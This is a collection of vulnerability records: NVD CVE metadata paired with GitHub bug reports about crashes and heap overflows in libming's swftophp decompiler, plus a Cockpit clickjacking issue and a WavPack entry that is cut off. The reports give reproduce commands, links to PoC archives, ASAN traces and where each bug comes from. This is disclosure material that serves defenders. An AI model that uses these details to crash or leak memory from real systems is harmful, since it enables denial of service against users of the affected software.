Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile457.zip](https://github.com/libming/libming/files/5118022/seg-decompile457.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==19422==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000041ef74 bp 0x0c10000017fb sp 0x7ffee6469480 T0) #0 0x41ef73 in getName ../../util/decompile.c:457 #1 0x42b65b in decompileDELETE ../../util/decompile.c:3175 #2 0x42b65b in decompileAction ../../util/decompile.c:3436 #3 0x44e234 in decompileActions ../../util/decompile.c:3535 #4 0x44e234 in decompile5Action ../../util/decompile.c:3558 #5 0x4114d9 in outputSWF_INITACTION ../../util/outputscript.c:1860 #6 0x402836 in readMovie ../../util/main.c:281 #7 0x402836 in main ../../util/main.c:354 #8 0x7f82c681082f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #9 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../util/decompile.c:457 getName ==19422==ABORTING ~~~~ The cause is due to the incomplete check in line 452 mentioned in the Figure. <img width="1020" alt="image" src="https://user-images.githubusercontent.com/7632714/91049849-671dcd80-e650-11ea-8030-0bb3adeff1ae.png">
Segmentation fault in function getName, decompile.c:457
https://api.github.com/repos/libming/libming/issues/201/comments
0
2020-08-24T13:27:16Z
2020-08-24T13:30:07Z
https://github.com/libming/libming/issues/201
684,668,891
201
3,314
CVE-2021-34339
2022-03-10T17:42:37.283
Ming 0.4.8 has an out-of-bounds buffer access issue in the function getString() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969607" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/202" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969607" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/202" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/libming/libming/issues/202
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile380.zip](https://github.com/libming/libming/files/5118100/seg-decompile380.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==187067==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000041d8dc bp 0x0fffd003f178 sp 0x7ffe801f8bb0 T0) #0 0x41d8db in getString ../../util/decompile.c:380 #1 0x424764 in decompilePUSHPARAM ../../util/decompile.c:878 #2 0x42d225 in decompileSTARTDRAG ../../util/decompile.c:3054 #3 0x42d225 in decompileAction ../../util/decompile.c:3433 #4 0x44e234 in decompileActions ../../util/decompile.c:3535 #5 0x44e234 in decompile5Action ../../util/decompile.c:3558 #6 0x4114d9 in outputSWF_INITACTION ../../util/outputscript.c:1860 #7 0x402836 in readMovie ../../util/main.c:281 #8 0x402836 in main ../../util/main.c:354 #9 0x7fe9f9c4482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #10 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../util/decompile.c:380 getString ==187067==ABORTING ~~~~ The cause is due to the uncheck index of act->p.Constant8 mentioned in Figure. <img width="1037" alt="image" src="https://user-images.githubusercontent.com/7632714/91050602-79e4d200-e651-11ea-99fa-91d3604cea1d.png">
Segmentation fault in function getString, decompile.c:380
https://api.github.com/repos/libming/libming/issues/202/comments
1
2020-08-24T13:33:55Z
2020-08-24T14:49:29Z
https://github.com/libming/libming/issues/202
684,675,767
202
3,315
CVE-2021-34340
2022-03-10T17:42:37.657
Ming 0.4.8 has an out-of-bounds buffer access issue in the function decompileINCR_DECR() in decompiler.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969612" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/203" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969612" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/203" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/libming/libming/issues/203
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a segmentation fault in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [seg-decompile1640.zip](https://github.com/libming/libming/files/5123144/seg-decompile1640.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==79767==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000010 (pc 0x00000042782c bp 0x0000000000f0 sp 0x7ffdbd64ccf0 T0) #0 0x42782b in decompileINCR_DECR ../../util/decompile.c:1640 #1 0x44e234 in decompileActions ../../util/decompile.c:3535 #2 0x44e234 in decompile5Action ../../util/decompile.c:3558 #3 0x4114d9 in outputSWF_INITACTION ../../util/outputscript.c:1860 #4 0x402836 in readMovie ../../util/main.c:281 #5 0x402836 in main ../../util/main.c:354 #6 0x7fd557eb582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #7 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../util/decompile.c:1640 decompileINCR_DECR ==79767==ABORTING ~~~~ The cause might due to the incomplete check related to the index for array regs. <img width="1122" alt="image" src="https://user-images.githubusercontent.com/7632714/91164248-59745080-e701-11ea-8158-6cdf378decd9.png">
Segmentation fault in function decompileINCR_DECR, decompile.c 1640
https://api.github.com/repos/libming/libming/issues/203/comments
0
2020-08-25T10:33:55Z
2020-08-25T10:33:55Z
https://github.com/libming/libming/issues/203
685,372,287
203
3,316
CVE-2021-34341
2022-03-10T17:42:37.920
Ming 0.4.8 has an out-of-bounds read vulnerability in the function decompileIF() in the decompile.c file that causes a direct segmentation fault and leads to denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969628" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/204" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969628" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/204" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libming/libming/issues/204
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler2516.zip](https://github.com/libming/libming/files/5123238/overflow-decompiler2516.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==165852==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60e00000dc88 at pc 0x00000044d878 bp 0x7ffd6043c430 sp 0x7ffd6043c420 READ of size 8 at 0x60e00000dc88 thread T0 #0 0x44d877 in decompileIF ../../util/decompile.c:2516 #1 0x442c5c in decompileActions ../../util/decompile.c:3535 #2 0x442c5c in decompileIF ../../util/decompile.c:2407 #3 0x43d3d4 in decompileActions ../../util/decompile.c:3535 #4 0x43d3d4 in decompileSETTARGET ../../util/decompile.c:3211 #5 0x43c38b in decompileActions ../../util/decompile.c:3535 #6 0x432866 in decompileTRY ../../util/decompile.c:2785 #7 0x432866 in decompileAction ../../util/decompile.c:3518 #8 0x44e234 in decompileActions ../../util/decompile.c:3535 #9 0x44e234 in decompile5Action ../../util/decompile.c:3558 #10 0x411304 in outputSWF_DOACTION ../../util/outputscript.c:1551 #11 0x402836 in readMovie ../../util/main.c:281 #12 0x402836 in main ../../util/main.c:354 #13 0x7f8b968e382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #14 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) 0x60e00000dc88 is located 8 bytes to the right of 160-byte region [0x60e00000dbe0,0x60e00000dc80) allocated by thread T0 here: #0 0x7f8b972487fa in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x987fa) #1 0x45e4cc in parseSWF_ACTIONRECORD ../../util/parser.c:1062 SUMMARY: AddressSanitizer: heap-buffer-overflow ../../util/decompile.c:2516 decompileIF Shadow bytes around the buggy address: 0x0c1c7fff9b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9b60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1c7fff9b70: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00 0x0c1c7fff9b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c1c7fff9b90: fa[fa]fa fa fa fa fa fa fd fd fd fd fd fd fd fd 0x0c1c7fff9ba0: fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa 0x0c1c7fff9bb0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd 0x0c1c7fff9bc0: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa 0x0c1c7fff9bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1c7fff9be0: 00 00 00 00 fa fa fa fa fa fa fa fa fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==165852==ABORTING ~~~~
Buffer overflow in decompileIF, decompile.c:2516
https://api.github.com/repos/libming/libming/issues/204/comments
0
2020-08-25T10:45:49Z
2020-08-25T10:45:49Z
https://github.com/libming/libming/issues/204
685,379,611
204
3,317
CVE-2021-34342
2022-03-10T17:42:38.207
Ming 0.4.8 has an out-of-bounds read vulnerability in the function newVar_N() in decompile.c which causes a huge information leak.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "patrick@puiterwijk.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969619" }, { "source": "patrick@puiterwijk.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/205" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1969619" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/libming/libming/issues/205" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libming:ming:0.4.8:*:*:*:*:*:*:*", "matchCriteriaId": "B2ADA512-48F0-4FC4-8614-0212A9799B56", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/libming/libming/issues/205
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "libming", "libming" ]
Hi, there. There is a buffer overflow in the newest master branch 04aee52 which causes a huge memory information leakage. Here is the reproducing command: ~~~~ swftophp poc ~~~~ POC: [overflow-decompiler751.zip](https://github.com/libming/libming/files/5123287/overflow-decompiler751.zip) Here is the reproduce trace reported by ASAN: ~~~~ ==8303==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000026680 at pc 0x7f2f1360124b bp 0x7ffcf9987390 sp 0x7ffcf9986b38 READ of size 1025 at 0x619000026680 thread T0 #0 0x7f2f1360124a in strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x7024a) #1 0x425b98 in newVar_N ../../util/decompile.c:751 #2 0x435db7 in decompileNEWOBJECT ../../util/decompile.c:1720 #3 0x435db7 in decompileAction ../../util/decompile.c:3324 #4 0x43d3d4 in decompileActions ../../util/decompile.c:3535 #5 0x43d3d4 in decompileSETTARGET ../../util/decompile.c:3211 #6 0x43c38b in decompileActions ../../util/decompile.c:3535 #7 0x432866 in decompileTRY ../../util/decompile.c:2785 #8 0x432866 in decompileAction ../../util/decompile.c:3518 #9 0x44e234 in decompileActions ../../util/decompile.c:3535 #10 0x44e234 in decompile5Action ../../util/decompile.c:3558 #11 0x411304 in outputSWF_DOACTION ../../util/outputscript.c:1551 #12 0x402836 in readMovie ../../util/main.c:281 #13 0x402836 in main ../../util/main.c:354 #14 0x7f2f12cc482f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #15 0x403b38 in _start (/mnt/data/playground/libming/build/util/swftophp+0x403b38) 0x619000026680 is located 0 bytes to the right of 1024-byte region [0x619000026280,0x619000026680) allocated by thread T0 here: #0 0x7f2f136299c1 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x989c1) #1 0x425b7b in newVar_N ../../util/decompile.c:754 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 strlen Shadow bytes around the buggy address: 0x0c327fffcc80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffcc90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffcca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffccb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c327fffccc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c327fffccd0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fffcce0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c327fffccf0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c327fffcd00: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c327fffcd10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd 0x0c327fffcd20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==8303==ABORTING ~~~~
Buffer overflow in newVar_N, decompile.c:751
https://api.github.com/repos/libming/libming/issues/205/comments
0
2020-08-25T10:55:36Z
2020-08-25T10:55:36Z
https://github.com/libming/libming/issues/205
685,385,426
205
3,318
CVE-2021-3660
2022-03-10T17:42:55.647
Cockpit (and its plugins) do not seem to protect itself against clickjacking. It is possible to render a page from a cockpit server via another website, inside an <iFrame> HTML entry. This may be used by a malicious website in clickjacking or similar attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1980688" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cockpit-project/cockpit/commit/8d9bc10d8128aae03dfde62fd00075fe492ead10" }, { "source": "secalert@redhat.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cockpit-project/cockpit/issues/16122" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1980688" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cockpit-project/cockpit/commit/8d9bc10d8128aae03dfde62fd00075fe492ead10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/cockpit-project/cockpit/issues/16122" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cockpit-project:cockpit:*:*:*:*:*:*:*:*", "matchCriteriaId": "24AF3BAD-6273-447B-ACC7-9705C2C198DC", "versionEndExcluding": "254", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1021" ]
1021
https://github.com/cockpit-project/cockpit/issues/16122
[ "Patch", "Third Party Advisory" ]
github.com
[ "cockpit-project", "cockpit" ]
Through a security scan, I was notified: > _The remote web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions._ Suggested solution is: > Return the X-Frame-Options or Content-Security-Policy (with the 'frame-ancestors' directive) HTTP header with the page's response. Is there a way to do this through the config in cockpit? or is there some other reason it is not subject to clickjacking? Downstream bug: https://bugzilla.redhat.com/show_bug.cgi?id=1980688 (plus a few dependent ones for the individual packages in Fedora and RHEL 8/9)
Is cockpit vulnerable to clickjacking? [CVE-2021-3660]
https://api.github.com/repos/cockpit-project/cockpit/issues/16122/comments
12
2021-07-20T13:49:33Z
2021-09-20T13:50:57Z
https://github.com/cockpit-project/cockpit/issues/16122
948,674,224
16,122
3,319
CVE-2021-44269
2022-03-10T17:44:14.923
An out of bounds read was found in Wavpack 5.4.0 in processing *.WAV files. This issue triggered in function WavpackPackSamples of file src/pack_utils.c, tainted variable cnt is too large, that makes pointer sptr read beyond heap bound.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/dbry/WavPack/issues/110" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2CZUFTX3J4Y4OSRITG4PXCI7NRVFDYVQ/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A5B7L26LA6KGX7YH6SWD5CSBNWKV5MBO/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRZWZKEEABCLVXZEXQZBIT3ZKLIXVFF5/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I54NXQZELBF42OL4KQZJJRAYZX7IPZXP/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SQKOOJRI2VAPYS3652HVDXON723HTXBP/" }, { "source": 